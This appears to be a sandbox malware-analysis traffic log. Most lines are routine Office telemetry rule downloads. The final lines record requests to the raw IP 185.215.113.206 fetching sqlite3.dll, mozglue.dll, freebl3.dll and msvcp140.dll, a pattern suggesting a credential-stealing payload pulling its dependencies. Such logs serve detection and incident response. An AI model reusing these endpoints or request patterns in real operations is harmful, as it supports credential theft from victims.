Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
